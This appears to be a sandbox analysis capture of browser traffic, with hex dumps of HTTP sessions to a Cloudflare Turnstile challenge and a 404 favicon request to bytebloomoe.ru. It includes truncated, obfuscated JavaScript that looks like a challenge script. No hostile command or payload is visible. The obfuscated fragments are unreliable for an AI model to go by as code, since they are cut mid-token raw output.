                            2024-08-13 19:57:36 UTC1369INData Raw: 2f 27 2b 65 4d 5b 67 4d 28 36 37 34 29 5d 5b 67 4d 28 36 34 31 29 5d 2c 27 2f 27 29 2c 65 4d 5b 67 4d 28 36 37 34 29 5d 5b 67 4d 28 37 39 32 29 5d 29 2c 6e 3d 6e 65 77 20 65 4d 5b 28 67 4d 28 31 30 38 38 29 29 5d 28 29 2c 21 6e 29 72 65 74 75 72 6e 3b 6f 3d 6a 5b 67 4d 28 32 34 38 29 5d 2c 6e 5b 67 4d 28 32 31 31 29 5d 28 6f 2c 6d 2c 21 21 5b 5d 29 2c 6e 5b 67 4d 28 38 39 32 29 5d 3d 32 35 30 30 2c 6e 5b 67 4d 28 37 39 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 6e 5b 67 4d 28 37 37 38 29 5d 28 67 4d 28 38 38 31 29 2c 67 4d 28 31 36 35 38 29 29 2c 73 3d 7b 7d 2c 73 5b 67 4d 28 31 32 32 35 29 5d 3d 66 2c 73 2e 63 63 3d 67 2c 73 5b 67 4d 28 31 34 32 39 29 5d 3d 6b 2c 78 3d 4a 53 4f 4e 5b 67 4d 28 38 32 39 29 5d 28 73 29 2c 42 3d 67 47 5b 67 4d 28 31
                            Data Ascii: /'+eM[gM(674)][gM(641)],'/'),eM[gM(674)][gM(792)]),n=new eM[(gM(1088))](),!n)return;o=j[gM(248)],n[gM(211)](o,m,!![]),n[gM(892)]=2500,n[gM(791)]=function(){},n[gM(778)](gM(881),gM(1658)),s={},s[gM(1225)]=f,s.cc=g,s[gM(1429)]=k,x=JSON[gM(829)](s),B=gG[gM(1
                            2024-08-13 19:57:36 UTC1369INData Raw: 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 3d 3d 3d 67 7d 2c 27 4d 65 51 77 53 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 21 3d 3d 67 7d 7d 2c 65 3d 63 5b 68 42 28 35 36 33 29 5d 2c 65 26 26 65 5b 68 42 28 31 34 32 39 29 5d 3d 3d 3d 68 42 28 31 35 32 39 29 26 26 65 5b 68 42 28 39 38 36 29 5d 3d 3d 3d 68 42 28 38 36 35 29 3f 66 6e 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 68 43 29 7b 68 43 3d 68 42 2c 64 5b 68 43 28 31 35 35 38 29 5d 28 68 43 28 31 34 31 39 29 2c 68 43 28 35 38 32 29 29 3f 64 5b 68 43 28 31 32 38 37 29 5d 28 66 51 29 3a 74 68 69 73 2e 68 5b 64 5b 68 43 28 31 34 36 34 29 5d 28 64 5b 68 43 28 39 38 35 29 5d 28 74 68 69 73 2e 68 5b 64 5b 68 43 28 35 33 37 29
                            Data Ascii: N':function(f,g){return f===g},'MeQwS':function(f,g){return f!==g}},e=c[hB(563)],e&&e[hB(1429)]===hB(1529)&&e[hB(986)]===hB(865)?fn=setInterval(function(hC){hC=hB,d[hC(1558)](hC(1419),hC(582))?d[hC(1287)](fQ):this.h[d[hC(1464)](d[hC(985)](this.h[d[hC(537)
                            2024-08-13 19:57:36 UTC1369INData Raw: 67 29 7b 72 65 74 75 72 6e 20 66 53 28 65 5b 69 74 28 38 38 36 29 5d 28 66 54 2c 63 29 29 7d 7d 2c 66 56 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 69 75 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 69 75 3d 67 49 2c 67 3d 7b 7d 2c 67 5b 69 75 28 31 32 37 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 2b 73 7d 2c 67 5b 69 75 28 33 35 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 2b 73 7d 2c 67 5b 69 75 28 35 30 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 2d 73 7d 2c 67 5b 69 75 28 32 30 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 26 73 7d 2c 67 5b 69 75 28 37 32 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72
                            Data Ascii: g){return fS(e[it(886)](fT,c))}},fV=function(f,iu,g,h,i,j,k,l,m){for(iu=gI,g={},g[iu(1277)]=function(n,s){return n+s},g[iu(357)]=function(n,s){return n+s},g[iu(504)]=function(n,s){return n-s},g[iu(209)]=function(n,s){return n&s},g[iu(722)]=function(n,s){r
                            2024-08-13 19:57:36 UTC1369INData Raw: 75 72 6e 20 47 2b 48 7d 7d 2c 6f 5b 6a 48 28 34 35 31 29 5d 28 6e 75 6c 6c 2c 68 29 7c 7c 68 3d 3d 3d 76 6f 69 64 20 30 29 72 65 74 75 72 6e 20 6a 3b 66 6f 72 28 78 3d 67 44 28 68 29 2c 67 5b 6a 48 28 31 33 33 37 29 5d 5b 6a 48 28 33 36 39 29 5d 26 26 28 78 3d 78 5b 6a 48 28 31 33 38 30 29 5d 28 67 5b 6a 48 28 31 33 33 37 29 5d 5b 6a 48 28 33 36 39 29 5d 28 68 29 29 29 2c 78 3d 67 5b 6a 48 28 31 31 36 35 29 5d 5b 6a 48 28 31 32 33 32 29 5d 26 26 67 5b 6a 48 28 31 30 39 36 29 5d 3f 67 5b 6a 48 28 31 31 36 35 29 5d 5b 6a 48 28 31 32 33 32 29 5d 28 6e 65 77 20 67 5b 28 6a 48 28 31 30 39 36 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 6a 4a 2c 48 29 7b 66 6f 72 28 6a 4a 3d 6a 48 2c 47 5b 6a 4a 28 31 35 34 39 29 5d 28 29 2c 48 3d 30 3b 48 3c 47 5b
                            Data Ascii: urn G+H}},o[jH(451)](null,h)||h===void 0)return j;for(x=gD(h),g[jH(1337)][jH(369)]&&(x=x[jH(1380)](g[jH(1337)][jH(369)](h))),x=g[jH(1165)][jH(1232)]&&g[jH(1096)]?g[jH(1165)][jH(1232)](new g[(jH(1096))](x)):function(G,jJ,H){for(jJ=jH,G[jJ(1549)](),H=0;H<G[
                            2024-08-13 19:57:36 UTC1369INData Raw: 72 6e 20 68 28 29 7d 2c 27 57 55 68 51 69 27 3a 6a 4d 28 36 31 32 29 2c 27 49 54 51 76 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 69 7d 2c 27 65 46 47 49 76 27 3a 6a 4d 28 31 33 35 33 29 2c 27 56 6e 41 77 51 27 3a 6a 4d 28 31 32 39 34 29 2c 27 6f 7a 4c 55 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 4a 66 70 70 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 45 6c 4e 56 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 52 4d 53 51 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 59 77 6b 7a 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72
                            Data Ascii: rn h()},'WUhQi':jM(612),'ITQvn':function(h,i){return h!==i},'eFGIv':jM(1353),'VnAwQ':jM(1294),'ozLUA':function(h,i){return i==h},'Jfppf':function(h,i){return h-i},'ElNVj':function(h,i){return h(i)},'RMSQi':function(h,i){return h|i},'Ywkze':function(h,i){r
                            2024-08-13 19:57:36 UTC1369INData Raw: 4f 29 7b 72 65 74 75 72 6e 20 6a 4f 3d 6a 4e 2c 6a 5b 6a 4f 28 31 32 35 37 29 5d 5b 6a 4f 28 31 39 36 29 5d 28 6b 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 6a 50 2c 4f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 29 7b 69 66 28 6a 50 3d 6a 4d 2c 64 5b 6a 50 28 31 36 33 33 29 5d 28 64 5b 6a 50 28 38 36 37 29 5d 2c 6a 50 28 31 33 35 33 29 29 29 7b 69 66 28 21 6f 5b 6a 50 28 35 30 38 29 5d 29 7b 28 4a 5b 6a 50 28 36 37 34 29 5d 5b 6a 50 28 35 36 37 29 5d 3d 31 2c 4b 5b 6a 50 28 37 34 39 29 5d 29 26 26 28 4f 3d 7b 7d 2c 4f 5b 6a 50 28 31 34 32 39 29 5d 3d 6a 50 28 31 35 32 39 29 2c 4f 5b 6a 50 28 37 30 34 29 5d 3d 56 5b 6a 50 28 36 37 34 29 5d 5b 6a 50 28 36 32 30 29 5d 2c 4f 5b 6a 50 28 39
                            Data Ascii: O){return jO=jN,j[jO(1257)][jO(196)](k)})},'g':function(i,j,o,jP,O,s,x,B,C,D,E,F,G,H,I,J,K,L,M){if(jP=jM,d[jP(1633)](d[jP(867)],jP(1353))){if(!o[jP(508)]){(J[jP(674)][jP(567)]=1,K[jP(749)])&&(O={},O[jP(1429)]=jP(1529),O[jP(704)]=V[jP(674)][jP(620)],O[jP(9
                            2024-08-13 19:57:36 UTC1369INData Raw: 5d 28 48 3c 3c 31 2e 31 33 2c 64 5b 6a 50 28 33 36 31 29 5d 28 4d 2c 31 29 29 2c 49 3d 3d 64 5b 6a 50 28 35 37 30 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 6a 50 28 31 36 33 39 29 5d 28 64 5b 6a 50 28 31 31 39 31 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 43 3d 28 44 2d 2d 2c 44 3d 3d 30 26 26 28 44 3d 4d 61 74 68 5b 6a 50 28 33 34 38 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 78 5b 4c 5d 3d 45 2b 2b 2c 53 74 72 69 6e 67 28 4b 29 29 7d 69 66 28 43 21 3d 3d 27 27 29 7b 69 66 28 4f 62 6a 65 63 74 5b 6a 50 28 36 30 37 29 5d 5b 6a 50 28 31 32 38 39 29 5d 5b 6a 50 28 31 31 38 35 29 5d 28 42 2c 43 29 29 7b 69 66 28 64 5b 6a 50 28 38 31 30 29 5d 28 32 35 36 2c 43 5b 6a 50 28 38 31 31 29 5d 28 30 29 29 29 7b 69 66 28 64
                            Data Ascii: ](H<<1.13,d[jP(361)](M,1)),I==d[jP(570)](j,1)?(I=0,G[jP(1639)](d[jP(1191)](o,H)),H=0):I++,M>>=1,s++);C=(D--,D==0&&(D=Math[jP(348)](2,F),F++),x[L]=E++,String(K))}if(C!==''){if(Object[jP(607)][jP(1289)][jP(1185)](B,C)){if(d[jP(810)](256,C[jP(811)](0))){if(d


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.649731104.18.95.414432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:37 UTC795OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/0rq59/0x4AAAAAAAhE9zkCiN0ETgsg/auto/fbE/normal/auto/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:37 UTC240INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:57:37 GMT
                            Content-Type: image/png
                            Content-Length: 61
                            Connection: close
                            cache-control: max-age=2629800, public
                            Server: cloudflare
                            CF-RAY: 8b2b467339cf8ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:57:37 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                            Data Ascii: PNGIHDRsIDAT$IENDB`


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            12192.168.2.649721104.21.81.2074432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:37 UTC636OUTGET /favicon.ico HTTP/1.1
                            Host: bytebloomoe.ru
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://bytebloomoe.ru/8QnWX/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            Cookie: PHPSESSID=kn523ugumdhe6h89qej7h3np25
                            2024-08-13 19:57:37 UTC655INHTTP/1.1 404 Not Found
                            Date: Tue, 13 Aug 2024 19:57:37 GMT
                            Content-Type: text/html
                            Transfer-Encoding: chunked
                            Connection: close
                            cache-control: private, no-cache, max-age=0
                            pragma: no-cache
                            vary: Accept-Encoding
                            CF-Cache-Status: BYPASS
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9RETPoyNhtflLfsBYjg71yrDKAEAuv5jH1I0GE9jcfVaZuf8ZUj7dK7AvI8af%2F5ZFu%2BvWo%2F49k%2FPkCgRPKiOiaqOR46jbJaNx6vRzJA3HRNA5tEc0IZogx1z2u2Ye3Pp8w%3D%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8b2b46754ac180dc-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:57:37 UTC714INData Raw: 34 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f
                            Data Ascii: 4e0<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</
                            2024-08-13 19:57:37 UTC541INData Raw: 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69
                            Data Ascii: resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px soli
                            2024-08-13 19:57:37 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                            Data Ascii: 1
                            2024-08-13 19:57:37 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            13192.168.2.649732104.18.95.414432448C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-08-13 19:57:37 UTC926OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1850929969:1723574616:8PT3AyiGmN4W4umEYHIb06JjWIFlP6lIjxkzNvrNFc0/8b2b466a48c34405/ca1f4aa5097dc0c HTTP/1.1
                            Host: challenges.cloudflare.com
                            Connection: keep-alive
                            Content-Length: 2986
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            Content-type: application/x-www-form-urlencoded
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            CF-Challenge: ca1f4aa5097dc0c
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Origin: https://challenges.cloudflare.com
                            Sec-Fetch-Site: same-origin
                            Sec-Fetch-Mode: cors
                            Sec-Fetch-Dest: empty
                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/0rq59/0x4AAAAAAAhE9zkCiN0ETgsg/auto/fbE/normal/auto/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-08-13 19:57:37 UTC2986OUTData Raw: 76 5f 38 62 32 62 34 36 36 61 34 38 63 33 34 34 30 35 3d 4a 71 31 2d 35 2d 4b 2d 2d 2d 52 2d 4f 2d 52 79 24 78 79 24 75 53 69 75 69 63 65 35 69 65 24 69 53 70 63 74 69 42 70 24 4c 79 24 65 74 31 24 48 24 36 7a 57 63 64 67 24 41 4a 79 78 6e 30 24 61 7a 65 4a 38 24 45 4b 75 2d 24 50 65 53 6f 6e 24 65 7a 65 6f 67 24 36 53 55 24 65 48 7a 69 72 4c 24 72 75 24 66 51 7a 24 71 6d 6d 24 69 31 24 61 24 4a 31 47 24 57 30 77 52 74 43 24 72 2d 6d 67 24 6a 4d 53 69 56 64 6e 7a 25 32 62 63 24 51 4e 53 65 45 64 31 72 6f 7a 79 61 37 32 36 6a 70 45 24 65 30 24 34 52 39 67 69 6f 55 63 45 2d 69 57 61 7a 69 32 48 48 24 4b 72 69 7a 7a 62 6f 4a 75 6b 61 7a 24 70 6c 45 38 24 69 30 32 56 36 45 4e 47 70 63 79 4a 50 24 48 42 61 2b 68 6c 61 79 4e 4a 30 58 38 70 50 69 75 37 79 2d 24
                            Data Ascii: v_8b2b466a48c34405=Jq1-5-K---R-O-Ry$xy$uSiuice5ie$iSpctiBp$Ly$et1$H$6zWcdg$AJyxn0$azeJ8$EKu-$PeSon$ezeog$6SU$eHzirL$ru$fQz$qmm$i1$a$J1G$W0wRtC$r-mg$jMSiVdnz%2bc$QNSeEd1rozya726jpE$e0$4R9gioUcE-iWazi2HH$KrizzboJukaz$plE8$i02V6ENGpcyJP$HBa+hlayNJ0X8pPiu7y-$
                            2024-08-13 19:57:38 UTC755INHTTP/1.1 200 OK
                            Date: Tue, 13 Aug 2024 19:57:38 GMT
                            Content-Type: text/plain; charset=UTF-8
                            Content-Length: 131672
                            Connection: close
                            cf-chl-gen: 0fGYWOJiJ3O+QZ/TUMIgSO1AfSMDepp6021zzVVpE32VhEgtmFlzX5B6MnEF8Qo0sysjnRZnn1bzlO3+A18haRvoPMQAkqb60GivbQuzbvwAvWYOwdWuBjzb9yQWdE0sk5+sr9d3zMFS8pN5NnJkN/heVHNg9lGcAP4hh0xc4DTmGE1EPMjm6wQA2pHMi4KX3OYBvFDyNSzzq2OLT8BwycOJI9fjnI2ROJ2sf4JqNhPT6daD+5XEgcYaES0perrZF2zfJ+pTGHGQswv6UBVFFGPELj9t0HkPZb7TlqLoALv6rl2mEi/L632qXnyOHA/aiTM4aENFkf+SoIZtlsBSs5dPC0XHrtg80gCkoHVCdjD2uUoktBsN+/8f9au67JRu0peIqYPqOskkK3coy/HFcZ2droAQ4mWMUqCGFsZWWpClUjGx3P5/uT1NdYGnW985V0Nxn1PSHoGib7ZOvvD1RGFubGpJ4n3OT6AmqIE2qSyR9sMvm0Sc+w==$vON+Ic5mCsq09YRp
                            Server: cloudflare
                            CF-RAY: 8b2b46784e6b9e17-EWR
                            alt-svc: h3=":443"; ma=86400
                            2024-08-13 19:57:38 UTC614INData Raw: 73 63 54 42 6e 4c 69 7a 67 73 65 48 79 4b 75 73 7a 35 71 51 68 35 33 44 76 70 53 74 79 4a 69 32 71 39 71 57 32 74 65 65 6e 72 32 61 6c 62 50 44 35 2b 54 55 35 63 6e 72 74 63 62 47 34 38 57 78 79 61 72 66 71 2b 65 33 77 74 6e 70 33 50 54 6e 76 64 44 71 32 62 6a 42 33 2f 43 2f 78 76 48 34 43 67 6a 62 36 63 6a 36 32 77 66 79 2b 38 6f 55 45 39 54 32 39 42 58 61 48 64 66 5a 44 2b 44 37 37 78 51 62 49 2f 4d 59 48 78 33 38 42 51 30 69 42 67 7a 38 41 53 34 41 38 77 77 6a 4c 52 72 7a 49 7a 45 65 2b 53 30 4e 4c 42 4a 41 2b 66 59 36 4e 77 4d 66 49 6a 74 45 47 30 46 44 4c 6a 4a 48 53 41 6f 79 52 78 46 52 54 7a 41 74 55 55 70 50 53 44 63 78 58 32 51 30 56 69 59 6d 5a 55 55 79 49 53 4a 41 51 43 39 74 58 6e 45 72 51 45 6c 72 61 58 46 6b 56 48 70 77 52 6c 56 37 53 54 4e
                            Data Ascii: scTBnLizgseHyKusz5qQh53DvpStyJi2q9qW2teenr2albPD5+TU5cnrtcbG48Wxyarfq+e3wtnp3PTnvdDq2bjB3/C/xvH4Cgjb6cj62wfy+8oUE9T29BXaHdfZD+D77xQbI/MYHx38BQ0iBgz8AS4A8wwjLRrzIzEe+S0NLBJA+fY6NwMfIjtEG0FDLjJHSAoyRxFRTzAtUUpPSDcxX2Q0ViYmZUUyISJAQC9tXnErQElraXFkVHpwRlV7STN
                            2024-08-13 19:57:38 UTC1369INData Raw: 74 65 68 45 71 45 58 31 52 57 6a 48 4e 32 63 35 53 58 63 31 68 2b 6b 48 47 56 6e 6e 71 62 6b 32 42 6f 6d 32 64 6d 6d 49 47 4b 63 48 43 46 63 70 4f 6f 74 58 5a 71 72 5a 43 63 73 49 61 61 74 4a 78 34 77 37 79 5a 6f 71 36 38 6b 62 69 54 6c 49 79 69 67 4b 2b 59 67 35 4b 6c 77 4a 48 49 6e 36 2f 4d 79 62 79 61 6c 72 71 33 75 74 2f 4e 6f 72 7a 68 76 4c 32 38 70 72 6a 6f 77 65 58 49 35 64 6e 4a 36 4c 43 77 30 65 37 6a 37 72 44 6d 36 63 6a 63 75 50 37 74 41 66 65 36 39 38 38 45 35 75 4c 63 2f 4f 62 6a 2f 67 33 50 36 76 6e 72 43 41 48 53 34 51 51 53 37 4e 63 54 46 52 7a 74 46 50 55 62 32 68 34 6b 38 4f 44 7a 4a 76 51 67 49 69 4d 48 44 68 6f 6f 49 77 49 69 4b 7a 62 74 46 43 4d 51 4c 76 59 49 48 68 34 36 4e 54 49 50 51 69 51 47 41 44 6f 42 46 30 41 63 53 53 6b 74 44
                            Data Ascii: tehEqEX1RWjHN2c5SXc1h+kHGVnnqbk2Bom2dmmIGKcHCFcpOotXZqrZCcsIaatJx4w7yZoq68kbiTlIyigK+Yg5KlwJHIn6/Mybyalrq3ut/NorzhvL28prjoweXI5dnJ6LCw0e7j7rDm6cjcuP7tAfe6988E5uLc/Obj/g3P6vnrCAHS4QQS7NcTFRztFPUb2h4k8ODzJvQgIiMHDhooIwIiKzbtFCMQLvYIHh46NTIPQiQGADoBF0AcSSktD
                            2024-08-13 19:57:38 UTC1369INData Raw: 53 56 6c 5a 56 6d 34 69 52 6a 70 6c 58 63 6c 35 2b 65 5a 6d 41 6f 36 6c 30 6f 36 75 65 70 48 65 41 6a 58 75 6b 73 48 2b 43 69 4b 71 78 6b 4c 74 36 63 6f 36 49 75 62 71 7a 6e 35 69 54 6d 6e 69 6b 68 35 36 71 67 36 6d 36 79 62 33 47 71 4a 4b 64 6b 36 53 66 31 71 65 7a 71 71 79 55 6e 4a 61 57 73 61 44 4b 74 5a 2b 62 32 39 33 6f 77 4b 47 30 6e 74 71 6b 35 71 32 36 79 4f 37 43 7a 75 50 4b 37 2f 54 52 7a 39 79 76 30 2b 7a 57 39 2f 50 72 7a 4e 61 2f 2b 66 54 65 79 50 67 4a 42 73 37 46 38 66 77 53 30 41 6f 52 30 2b 55 4a 31 2f 51 54 46 77 73 58 44 4f 73 41 33 41 4d 54 39 50 77 43 33 79 41 72 4b 79 54 6f 43 51 72 69 45 69 6f 55 4d 41 30 42 44 53 77 78 49 78 45 78 44 78 45 62 4d 68 4c 30 4a 54 63 38 2b 42 6c 4a 42 54 38 68 50 68 38 68 4a 30 49 6a 4b 53 4e 48 54 41
                            Data Ascii: SVlZVm4iRjplXcl5+eZmAo6l0o6uepHeAjXuksH+CiKqxkLt6co6Iubqzn5iTmnikh56qg6m6yb3GqJKdk6Sf1qezqqyUnJaWsaDKtZ+b293owKG0ntqk5q26yO7CzuPK7/TRz9yv0+zW9/PrzNa/+fTeyPgJBs7F8fwS0AoR0+UJ1/QTFwsXDOsA3AMT9PwC3yArKyToCQriEioUMA0BDSwxIxExDxEbMhL0JTc8+BlJBT8hPh8hJ0IjKSNHTA
                            2024-08-13 19:57:38 UTC1369INData Raw: 6e 46 69 68 6d 49 75 52 65 48 74 6a 64 35 70 33 6f 48 79 61 64 6d 65 42 6a 6f 53 4e 61 61 78 77 6a 4a 69 73 6d 61 61 49 71 6d 2b 4a 6a 58 4b 39 6f 70 33 42 75 59 36 6c 73 6f 69 33 76 49 79 47 70 59 47 36 7a 34 6a 4d 7a 61 76 58 31 4a 69 35 78 73 72 54 74 64 75 56 77 4c 53 2b 30 74 47 36 74 65 47 30 75 75 69 38 33 62 33 6c 36 38 50 6d 34 64 44 52 36 63 4c 42 78 38 50 72 39 63 7a 51 75 74 6e 63 79 37 76 77 41 76 44 54 38 67 6e 56 77 77 50 6c 35 63 37 76 2f 65 41 4f 42 41 45 4c 7a 52 66 74 47 42 59 54 45 50 6a 35 44 52 76 68 42 42 66 39 48 78 30 6b 49 79 76 6d 48 68 30 44 2b 41 38 6f 42 41 37 38 4c 41 30 4b 41 54 51 4e 4f 2f 55 34 4a 69 67 36 41 44 6f 4f 48 78 6b 37 48 30 51 65 53 6b 56 45 49 55 55 67 48 79 78 4f 4c 52 41 79 52 51 39 5a 52 53 6b 73 56 30 5a
                            Data Ascii: nFihmIuReHtjd5p3oHyadmeBjoSNaaxwjJismaaIqm+JjXK9op3BuY6lsoi3vIyGpYG6z4jMzavX1Ji5xsrTtduVwLS+0tG6teG0uui83b3l68Pm4dDR6cLBx8Pr9czQutncy7vwAvDT8gnVwwPl5c7v/eAOBAELzRftGBYTEPj5DRvhBBf9Hx0kIyvmHh0D+A8oBA78LA0KATQNO/U4Jig6ADoOHxk7H0QeSkVEIUUgHyxOLRAyRQ9ZRSksV0Z
